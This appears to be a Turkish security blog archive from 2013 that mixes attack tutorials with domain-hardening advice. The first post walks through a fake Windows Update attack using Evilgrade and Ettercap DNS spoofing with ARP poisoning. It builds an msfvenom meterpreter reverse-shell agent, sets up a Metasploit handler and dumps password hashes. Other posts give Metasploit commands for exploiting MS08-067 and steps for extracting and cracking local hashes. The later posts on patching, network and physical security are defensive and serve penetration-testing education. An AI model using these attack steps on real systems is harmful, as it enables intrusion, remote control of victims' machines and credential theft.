28 Ağustos 2013 Çarşamba

İpucu: Windows Update Özelliğinin Kötüye Kullanılması

İpucu: Windows Update Özelliğinin Kötüye Kullanılması

Uygun şekilde yapılandırılmamaış ağlarda saldırgan, kurban olarak seçtiği bir bilgisayar ile bu bilgisayarın gitmek istediği hedef adresin arasına girebilir. Örneğin Windows işletim sistemini güncellemesini gerçekleştirmek isteyen kurban, Microsoft’un güncelleme sitesine gitmek yerine, saldırganın belirlediği DNS kaydına göre ilgili bir sunucuya yönlendirilebilir. Böylece Windows işletim güncellemesi yerine saldırganın gönderdiği zararlı yazılım yüklenerek kurban bilgisayar, saldırganın eline geçmiş olur.

Bu işlemler 7 adımda incelenecektir:
  • Saldırgan ve kurban bilgisayarları birbirlerine olan erişimleri kontrol edilecek
  • Evilgrade uygulaması kurulacak ve “winupdate” modülü seçilecek
  • “winupdate” modülü ve ilgili diğer kaynaklar ayarlanacak
  • Ettercap ile KurbanaDNS spoofing saldırısı gerçekleştirilecek
  • Saldırgan, kurban bilgisayardan gelen bağlantı taleplerini dinleyecek olan bir ortamı hazırlayacak
  • Kurban işletim sistemini güncellemek için talepte bulunacak ve saldırganın hazırlamış olduğu zararlı uygulamayı indirecek
  • Kurbanın zararlı yazılımı çalıştırmasıyla saldırgan kurbanın bilgisayarına bağlanacak ve hak yükseltecek

Erişimlerin Kontrolü
Kurban makine (192.168.100.78), saldırgan makineye erişebilmektedir:

Saldırgan makine (192.168.100.75), kurban makineye erişebilmektedir:


Evilgrade Uygulamasının Kurulumu ve Seçilen Modülün Seçilmesi
Öncelikle www.github.com/infobyte/evilgrade adresinden uygulama sıkıştırılmış bir dosya olarak indirilir:

Bu dosya saldırgana ait Backtrack bilgisayarına kopyalanır ve sıkıştırılmış dosya açılır. Evilgrade betiği çalıştırılır:

Modüllerin yüklenmesi beklenir:

Not: Diğer EvilGrade kurulum metodları için bakınız: http://blog.techdynamics.org/2011/07/howto-install-evilgrade-on-backtrack5.html

Not: Modüllerin listelenmesi için aşağıdaki komut çalıştırılır.
show modules

“winupdate” modülü kullanılmaya başlanır. Kullanılan komutlar aşağıdaki gibidir:
configure winupdate
show options

Not: Betik büyük/küçük harf duyarlıdır.
Üstteki ekran görüntüsünde de görüldüğü gibi “microsoft.com” üst alan adındaki bir takım sitelere erişim sağlanmaya çalışıldığında “agent.exe” adlı uygulama gönderilecektir.

“winupdate” Modülünün ve İlgili Kaynakların Ayarlanması
winupdate modülünde iki önemli nokta vardır: VirtualHost ve Agent. Bu başlıkta, 2 değere göre kaynak ayarlaması gerçekleştirilecektir.

VirtualHost: Kurban bilgisayara gerçekleştirilecek DNS Spoofing saldırısı için Ettercap adı verilen bir uygulama kullanılacaktır. Ettercap uygulaması, DNS spoofing için “/usr/local/share/ettercap/etter.dns” adlı dosyadaki DNS kayıtlarını kullanmaktadır. Bu dosya açılarak içerisine Microsoft sistemlerinin güncellenmesi için kulanılan DNS kayıtları için saldırgan tarafından belirlenen IP adresleri yazılır. Bu adres saldırganın sahip olduğu başka bir saldırı makinesi olabileceği gibi, saldırgann kullandığı Backtrack makinesi de olabilir. Örnek olarak saldırganın makinesi verilmiştir:

Agent: Kurbana gönderilecek olan ajan uygulamanın oluşturulması için msfcli, msfpayload, msfvenom, veya diğer teknikler kullanılabilir. Örnek olarak msfvenom kullanılacaktır. Bu amaçla ayrı bir konsolda msfvenom dizini tespit edilir:
which msfvenom
ls -la /usr/local/bin/msfvenom

EvilGrade uygulamasının başlatıldığı konsola geri dönülerek ajan uygulama oluşturulur. Bunun için, msfvenom kullanılarak kurbanın bağlanması istenen IP adresi (192.168.100.75) ve porta (TCP/4444) bağlantıyı sağlayacak olan “WindowsGuncellemeSaldirisi.exe” adlı bir exe oluşturulup tmp dizinine kaydedilir. Daha sonra da bu exe, ajan olarak ayarlanır.
set agent '["/opt/metasploit-4.4.0/app/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.100.75 LPORT=4444 -f exe  1> <%OUT%>/tmp/WindowsGuncellemeSaldirisi.exe<%OUT%>"]'

Ettercap ile DNS Spoofing İşleminin Başlatılması
Öncelikle boş bir konsol kullanılarak Ettercap arayüzü açılır. Daha sonra da spoofing işlemini gerçekleştirecek olan saldırganın ilgili ağ adaptörü seçilir (Shift + U).
ettercap -G
Sniff > Unified Sniffing 

Not: Seçilen adaptörün dinleme modunda olduğu görülmektedir.

Gelinen pencerede eklentiler listelenir (CTRL + P) ve “dns_spoof” adlı eklenti iki kerek tıklanarak aktifleştirilir:
Plugins > Manage the plugins
dns_spoof

Erişim sağlanabilen sistemler taranır (CTRL + S).
Hosts > Scan for hosts

Not: Tarama sonucunda tespit edilen sistemler listelenebilir (H):
Hosts > Hosts list

Tespit edilen sistemlere Arp zehirlemesi yapılır.
Mitm > Arp poisoning
Optional parameters: Sniff remote connections.

Not: Arp zehirleme işlemin gerçekleştirileceği gruplar otomatik olarak oluşur.

Dinleme işlemi başlatılır (CTRL +W).
Start > Start Sniffing

Not: İstemcinin herhangi bir işleminde saldırgan araya girmiş bulunmaktadır.

Saldırganın Kurban Bilgisayarı Dinlemesi
Saldırgan, saldırıya geçmeden önce kurbanın bağlantıyı kurdupubnda bu bağlantıyı dinleyeceği bir ortam gereklidir. Bu ortamı netcat sağlayabileceği gibi, meterpreter kabuğu ile iletişim kurabilen handler modülü de sağlayabilir. Kurbanın kuracağı bağlantıyı dinlemek için handler modülü başlatılır ve bağlantının kurulacağı IP (192.168.100.75) ve Port (4444) bilgisi girilir.
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.75
set LPORT 4444
show options

Gerekli ayarlamalar uygun şekilde gerçekleştirildikten sonra, kurbanın bağlantıyı başlatması beklenir:

Kurbanın Windows Güncelleştirmesini Başlatması ve Zararlı Yazılımı Alması
Kurban bilgisayarda Windows işletim sistemi güncelleştirilmesi için “windows.update.microsoft.com” adresi kullanılabilir:

Not: İşletim sisteminin otomatik olarak güncellenmesi de beklenebilirdi.
Ettercap’İn DNS kayıtlarını değiştirmesi sayesinde, kurban bilgisayar, Microsoft’un sitesi yerine saldırganın makinesine gider. EvilGrade’in winupdate modülü sayesinde de, kurban bilgisayar, yasal güncelleme paketi yerine, msfvenom ile oluşturulan zararlı yazılımı indirir:

Kurban zararlı yazılımı masaüstüne kaydeder:

Not: Zararlı yazılımının talep edilmesi EvilGrade üzerinde de görülebilmektedir.

Kurbanın Zararlı Yazılımı Çalıştırması ve Saldırganın Kurban Bilgisayarına Bağlanması
Kurban masaüstündeki zararlı yazılımı çalıştırır.

Kurban bilgisayarda bu zararlı yazılım çalıştırıldığında, yazılımın oluşturulduğu PAYLOAD sayesinde, kurban, saldırganın bilgisayarına bağlantı kuracaktır. Böylece bağlantı kurulmasını bekleyen Handler modülüne bağlantı kurulmuştur:

Artık hak yükseltme işlemi gerçekleştirilebilir. Bu amaçla tüm prosesler listelenir:
ps

Sistem hakları ile çalışan uygun bir prosese sıçranır. İstenirse yerel makinedeki hesapların parola özetleri elde edilebilir veya başka işlemler gerçekleştirilebilir:
migrate 1124
getuid
hashdump


Kaynak site:
http://www.mshowto.org/mitm-saldiri-yontemi-ile-windows-server-2008-nasil-hack-edilir.html
http://r00tsec.blogspot.com/2011/07/hacking-with-evilgrade-on-backtrack5.html

26 Ağustos 2013 Pazartesi

İpucu: Zafiyetin Kullanılarak Bir Bilgisayara Sızılması


Zafiyetin Kullanılarak Bir Bilgisayara Sızılması

Amaç
  • Zafiyet taraması ile elde edilen zafiyetlerden faydalanılarak, öncelikle bir makineye sızılacak ve sonrasında diğer makinelere yayılmaya çalışılacaktır.
  • Zafiyet tespit edilen makinede, tam yetki (SYSTEM kullanıcı hakları) ile erişim sağlanmaya çalışılacaktır.
Yöntem
Sızma teslerine başlamadan önce zafiyet taraması gerçekleştirilir. Zafiyet taramasının nasıl gerçekleştirildiği ile ilgili ayrıntılı bilgi için bakınız:
http://ertugrulbasaranoglu.blogspot.com/2012/12/ipucu-zafiyet-taramasnn.html
Zafiyet taraması ile MS08-067 açıklığı tespit edilen 192.168.72.201 IP'li bilgisayara sızma işlemi gerçekleştirilecektir. Bu sızma işlemi için, öncelikle msf konsol kullanılacaktır. Bu sebeple “/opt/metasploit/msf3” dizini veya mevcut dizin içerisindeki msfconsole çalıştırılır:
cd /opt/metasploit/msf3
./msfconsole
Şekil: msf konsolun başlatılması

Zafiyet taramasında bulunan zafiyetler Metasploit Framework içerisinde aranır, zafiyete ait modül kullanılarak seçenekleri incelenir. Zafiyet taraması sonucunda elde edilen zafiyet "MS08-67: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check)" şeklinde tanımlanmaktadır ve hedef makinede tam kontrol elde edilmesi sağlanmaktadır. Bu zafiyetli ilgili ayrıntılı bilgi için Ulusal Bilgi Güvenliği Kapısı'nda bulunun bağlantıdaki yazı incelenebilir.

Not: Windows 2000 işletim sistemi ile Windows XP SP2 ve öncesi sistemler Microsoft’un güncelleme desteğini kaldırdığı eski sistemlerdir. Bu sistemlerde güncel olan önemli güvenlik özellikleri bulunmadığı gibi sahip oldukları kritik açıklıklar için bile herhangi bir güvenlik güncellemesi üretilmemektedir. Bu yüzden bu tür eski sistemlerin aktif olarak kullanılıyor olması saldırganlar için önemli bir saldırı noktası oluşturmaktadır.

Aranan zafiyet modülü bulunduktan sonra sızma işlemi için gerekli seçenekler ayarlanır. Bu seçeneklerden en önemlisi RHOST (Hedef / kurban IP) değeridir:
search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.72.201
Şekil: Zafiyetle ilişkili modülün bulunması ve exploit işlemi için seçeneklerin ayarlanması

Hedefe yönelik tercih seçeneği de ayarlanabilir ancak bu seçeneğin ayarlanmaması tavsiye edilir:
show targets
Şekil: Hedefe yönelik seçeneklerin incelenmesi

Gerekirse, seçilen modül hakkında ayrıntılı seçenekler incelenerek, gelişmiş değişiklikler de gerçekleştirilebilir:
show advanced
Şekil: Modüle ait seçeneklerin ayrıntılı olarak incelenmesi

Exploit işlemi için uygun PAYLOAD belirlenir ve seçenekler incelenir.
set PAYLOAD windows/meterpreter/reverse_tcp
show options
Şekil: Uygun PAYLOAD değerinin seçilmesi

LHOST (Kaynak / Saldırgan IP) seçeneğine hedef IP’nin cevabını yollaması gerektiği IP bilgisi girilir. Exploit işlemi gerçekleştirilir:
set LHOST 192.168.172.200
show options
exploit
Şekil: PAYLOAD seçeneklerinin ayarlanması ve exploit işleminin başlatılması

Önlem

  • Organizasyonda belli periyotlarla zafiyet testi yapılmalıdır.
  • Sistemlerde bulunan zafiyetler giderilmelidir.
  • Eski sistemler yenileri ile değiştirilmeli, işletim sistemleri ve kullandıkları servislerin güncellemeleri geciktirilmeden uygulanmalıdır.


18 Ağustos 2013 Pazar

Etki Alanı Saldırılarından Korunma Yolları: Yama Yapılandırması

Etki Alanı Saldırılarından Korunma Yolları: Yama Yapılandırması

Etki alanı saldırıları ve sızma testleri sırasında port taramaları sonucunda elde edilen bilgiler kullanılarak zafiyet taramaları gerçekleştirilmektedir. Zafiyet taraması sonucunda elde edilen bilgilere göre, uygun saldırılar gerçekleştirilmektedir. Ayrıntılı bilgi için bakınız.

Kurumda, zafiyet taramalarının etkin olarak gerçekleştirilememesi sağlanmalıdır.  Bu amaçla ağ ayarları uygun olarak yapılandırılmalıdır. Ağ yapılandırılması ile ilgili yazı için bakınız.

Ayrıca, zafiyet taramasının gerçekleştirilmesi durumunda da olabildiğince az bilginin açığa çıkarılması da sağlanmalıdır. Bu sebeple, etki alanındaki bilgisayarlarda veya etki alanına erişebilen sistemlerde güncelleştirmeler gerçekleştirilmelidir.

Yama yönetimi için, en az aşağıdaki ayarların uygulanması gerekmektedir.
  • Güncellemeler konusundaki en önemli unsur kurum tarafında uygulanmak üzere bir yama yönetimi politikasının oluşturulması, adımlarının belirlenmesi, uygulanması ve sürekli olarak geliştirilmesidir.
  • Tüm bilgisayarlardaki Windows güncelleştirme ayarlarının uygun şekilde yapıldığından emin olunmalıdır. Aksi halde, araya giren saldırgan sistemleri kendisi üzerinden güncelleştirebilmektedir. Ayrıntılı bilgi için bakınız.
  • Etki alanında ve etki alanına erişimin sağlandığı sistemlerde periyodik olarak zafiyet taraması gerçekleştirilmelidir. Zafiyet taramasında mümkünse farklı araçların kullanılması tavsiye edilmektedir. Böylece bir araç tarafından tespit edilemeyen bazı zafiyetler diğer araçlarla tespit edilebilmektedir. Ayrıca kullanılan araçların da en güncel zafiyetleri barındırdığından emin olunmalı, güncelliği kontrol altında tutulmalıdır.
  • Anti virüs, saldırı tespit ve önleme sistemleri, anormallik tespit sistemleri gibi etki alanı ortamında güvenliği sağlamakla görevleri sistemlerin güncel olması ve son imzalara sahip olması gerekmektedir.
  • Tespit edilen zafiyetler kurumda uygulanan güncelleme yönetimi politikası kapsamında değerlendirilmelidir. Kritik zafiyetler, politika kapsamında belirlenen adımlardan geçtikten sonra, en kısa süre içerisinde merkezi olarak etki alanındaki bilgisayarlara dağıtılmalı ve yüklenmelidir. Güncelleştirmeleri almayan ve yüklenmeyen bilgisayarlar tespit edilmeli ve son güncelleştirmeleri alması sağlanmalıdır.
  • Saldırı yüzeyini azaltmak için bilgisayarlarda sadece gerekli programların bulunması ve bu programların sürüm kontrollerinin belli aralıklarla gerçekleştirilmesi gerekmektedir.
  • En son güncelleştirmelerden ve zafiyetlerden haberdar olmak için kurumda kullanılan sistemlere ait güvenlik bültenlerine, bloglara, posta gruplarına üye olunması gerekmektedir.


16 Ağustos 2013 Cuma

Etki Alanı Saldırılarından Korunma Yolları: Ağ Yapılandırması

Etki Alanı Saldırılarından Korunma Yolları: Ağ Yapılandırması

Etki alanına karşı yapılan saldırılar ve sızma testleri sırasında, bulunulan ağda IP ve port taraması gerçekleştirilmekte ve böylece ortamda çalışan servisler hakkında bilgi sahibi olunabilmektedir. Bu bilgileri kullanılarak ilgili sistemlere saldırılar gerçekleştirilebilmektedir. Bunun yanında sızılan ağda zafiyet taraması gerçekleştirilmekte ve zafiyete özel saldırılar düzenlenmektedir.
Ağ taramalarının etkin olarak gerçekleştirilememesi için, ağ taraması sonucunda olabildiğince az bilginin açığa çıkarılması sağlanmalıdır.  Bu amaçla ağ ayarları sıkılaştırılmalı ve yapılandırılmalıdır.
Ağ ayarlarının yapılandırılması için, en az aşağıdaki ayarların uygulanması gerekmektedir.
  • Etki alanındaki bilgisayarlara erişimler ortamdaki aktif cihazlarla kontrol edilmelidir. Sadece gerekli olan IP veya IP bloklarından erişimler sağlanabilmelidir. Ayrıca port kontrolü de gerçekleştirilmelidir. Özellikle kritik konumdaki sunuculara olan ağ bağlantıları için erişimler kontrollü olarak verilmelidir. Kurumdaki ağ mimarisinin güvenilir bir şekilde yapılandırılması konusu ile ilgili bir yazı dizisi Bilgi Güvenliği Kapısı'nda yayınlanmıştır: https://www.bilgiguvenligi.gov.tr/ag-guvenligi/guvenli-ag-mimarisi-tasarimi-1.html ve https://www.bilgiguvenligi.gov.tr/ag-guvenligi/guvenli-ag-mimarisi-tasarimi-2.html
  • Ağ yapılandırmasının yanında ortamda gerçekleştirilen tarama işlemlerinden haberdar olunabilmesi için anormal ağ trafiğinin tespiti ve önlenmesine yönelik gerekli çözümler kullanılmalıdır.
  • Bilgisayarlarda gereksiz olan tüm servisler kapatılmalıdır. Böylece saldırı yüzeyi azaltılır. Servis güvenliği için servisi çalıştıran kullanıcılar kontrol edilmelidir, varsayılan dışında oluşturulan servis hesaplarının parolalarının karmaşık ve uzun olması sağlanmalıdır. Bunun yanında erişilebilirliği sürdürebilmek için parolalar kilitlenmeyecek şekilde ayarlanmalı, periyodik olarak değiştirilmelidir.
  • Sızılan bir bilgisayarlar üzerinden diğer bilgisayarlara yayılma için en çok yönetimsel paylaşımlar kullanılmaktadır. Bunu önlemek için, yönetimsel paylaşımlar kullanılmaktadır. Bu sebeple yönetimsel paylaşımların kapatılması gerekmektedir. Eğer etki alanındaki yönetimsel operasyonlar için yönetimsel paylaşımlar gerekli ise, sadece bu operasyonları gerçekleştirecek olan özel kullanıcılar için yönetimsel paylaşımlarda işlem gerçekleştirme hakkı verilmesi gerekmektedir. Bu amaçla aşağıda belirtilen anahtar değerleri 0 olarak ayarlanmalıdır.
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\AutoShareServer
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\AutoShareWks
  • Paylaşımların kapatılamayacağı durumlarda paylaşımlara erişimler kısıtlanmalıdır. Belirli IP'ler üzerinden ve belirli kullanıcılar için paylaşımlara erişimler izin verilmelidir.
  • Paylaşımlarda sistemlere ait yedekleme dosyaları bulunmamalıdır. Bulunması gerekiyorsa, bu dosyalar şifreli saklanmalıdır.
  • Bilgisayarlardaki TCP/IP güvenliğine önem verilmelidir. Bu amaçla internet seçeneklerinden ayarlar yapılabileceği gibi, kayıt defterinde de gerekli ayarlar gerçekleştirilmelidir.


15 Ağustos 2013 Perşembe

İpucu: Yerel Hesap Bilgilerinin Çevrimiçi Olarak Elde Edilmesi

İpucu: Yerel Hesap Bilgilerinin Çevrimiçi Olarak Elde Edilmesi


Yerel kullanıcıların hesap bilgileri bilgisayar kapalı halde iken harici bir aygıt (USB/ CD / DVD) kullanılarak elde edilebilir. Ayrıntılı bilgi için bakınız:
http://ertugrulbasaranoglu.blogspot.com/2012/12/ipucu-makineye-fiziksel-olarak-eriserek.html
SAM ve SYSTEM dosyaları bilgisayar açık halde iken Cain&Abel gibi bir uygulama ile de elde edilebilir. Bu işlemi gerçekleştirebilmek için bilgisayar üzerinde yönetici haklarına sahip olmak gerekmektedir.

Öncelikle Cain & Abel isimli uygulama çalıştırılır, “Cracker” sekmesine tıklanır ve “+” ikonuna tıklanır.
Şekil - 1: Cain & Abel ile Cracker Adımı

Böylece yerel kullanıcı hesap özetleri elde edilir. Bu aşamaya ait ekran görüntüsü aşağıda verilmiştir.
Şekil - 2: Cain & Abel ile Yerel Kullanıcı Hesap Özetlerinin Ele Geçirilmesi

Bu aşamadan sonra ait hesap özetleri üzerinde sağ tıklanarak export işlemi yapılır ve oluşturulan dosya notepad ile açılarak “zayifKullanici” ya ait hesap özet bilgisinin NT Hash tarafı kopyalanır.
Şekil - 3: Yerel Kullanıcı Hesap Özetlerine Ait Çıktının Elde Edilmesi

Not: Windows 7 makinelerde varsayılan olarak LM özet tutulmamaktadır. LM özeti çok daha kolay bir şekilde kırılabilmektedir.

Web üzerinde bir çok sitede online olarak NT özetleri kırılmaktadır. Bu sitelerden bir tanesi de www.md5decrypter.co.uk adresli olanıdır. Bu siteye girerek kullanıcıya ait NT Hash bilgisi aşağıdaki resimdekine benzer şekilde girilirse, kullanıcıya ait açık parola bilgisi elde edilecektir.
Şekil - 4: Kullanıcıya Ait Açık Parola Bilgisinin Web Üzerinden Elde Edilmesi

13 Ağustos 2013 Salı

Etki Alanı Saldırılarından Korunma Yolları: Fiziksel Yapılandırma

Etki Alanı Saldırılarından Korunma Yolları: Fiziksel Yapılandırma

Etki alanına karşı yapılan saldırılar ve sızma testleri sırasında, fiziksel olarak erişim sağlanan bir bilgisayardan - SAM ve SYSTEM dosyalarına erişim sağlanarak - yerel kullanıcıların (özellikle yerel yöneticinin) kimlik bilgileri (kullanıcı adı ve parolası / parolasının özeti) alınmaktadır. Yerel yöneticilerin kimlik bilgilerinin saldırgan tarafından ele geçirilmesi çevrimiçi veya çevrimdışı yollarla gerçekleştirilebilir.  Bu tip saldırılar aşağıdaki gibi gerçekleştirilmektedir:

Samdump, Ophcrack, Cain & Abel gibi araçlar kullanılarak bu dosyalardan yerel kullanıcı hesap bilgileri elde edilebilir.
Bilgisayarların fiziksel yapılandırılması için, en az aşağıdaki ayarların uygulanması gerekmektedir.
  • Kritik sistemlere fiziksel erişimler kısıtlanmalıdır. Bu amaçla fiziksel güvenliğe önem verilmelidir.
  • Kayıt defterinden SAM ve SYSTEM dosyalarının elde edilememesi için veya Cain&Abel gibi uygulamalarla çevrim içi yollarla yerel kullanıcı hesap bilgilerinin alınamaması için mevcut kullanıcıların yönetici hakları ile oturum açmaması gerekmektedir. Yerel yönetici hakkına sahip kullanıcılardan bu hakların alınması veya süreli olarak verilmesi tavsiye edilmektedir.
  • Bilgisayarın BIOS ayarı yapılandırılmasında parola koruması eklenmelidir. Bu parolalar oldukça karmaşık ve her bilgisayar için farklı olması tavsiye edilmektedir. Bilgisayarın pili çıkarıldığında BIOS şifresinin sıfırlanmaması için özel ve yeni donanımlar tercih edilmelidir.

  • Bilgisayarın BIOS ayarı kontrol edilmeli ve öncelikle hard diskten başlatıldığından emin olunmalıdır.
  • USB veya CD-ROM / DVD-ROM gibi aygıtların kurum politikasına uygun olarak kullanılması ve gerek duyulmuyorsa, bu aygıtların devre dışı bırakılması veya donanımsal olarak bulundurulmaması tavsiye edilmektedir.
  • BIOS ayarı uygun şekilde yapılandırılmış olsa bile harici donanımlar kullanılarak harddisk içerisindeki bilgiler okunabilmektedir. Böylece BIOS ayarı yapılmış olsa bile, bilgisayardaki verilere (SAM ve SYSTEM dosyalarına) erişilebilmektedir. Bilgisayarlar çevrim dışı olarak açıldığında içerisindeki verilere erişilememesi için, Bitlocker / Truecrypt gibi çözümler kullanılarak (tam) disk şifreleme gerçekleştirilmelidir. Böylece,  kullanılan uygulamanın bir zafiyeti bulunmadığı takdirde, disk içerisindeki veriler elde edilemeyecektir. Disk şifreleme işleminde her bilgisayar için farklı bir parolanın / özel anahtarın kullanılması saldırı yüzeyini daraltacaktır.
  • Yerel kullanıcıların bilgilerine erişilebilse bile, parolanın açık halinin elde edilmesinin zorlaştırılması için hem LM özetlerinin kaydedilmemesi hem de parola oldukça karmaşık olarak belirlenmesi gerekmektedir. LM özetinin zayıflıkları konusu ile ilgili bir yazı Bilgi Güvenliği Kapısı'nda yayınlanmıştır: https://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/lanman-sifre-ozetinin-zayifliklari.html. Ancak Windows işletim sistemindeki kimlik doğrulama mekanizmalarındaki zayıflıktan dolayı parolaların açık hali elde edilmeden de, parola özetleri kullanılarak diğer bilgisayarlara yayılma gerçekleşebilir (Pass The Hash). Bu sebeple, BIOS yapılandırılması ve özellikle disk şifreleme gerçekleştirilerek, SAM ve SYSTEM dosyasına erişilememesi sağlanmalıdır.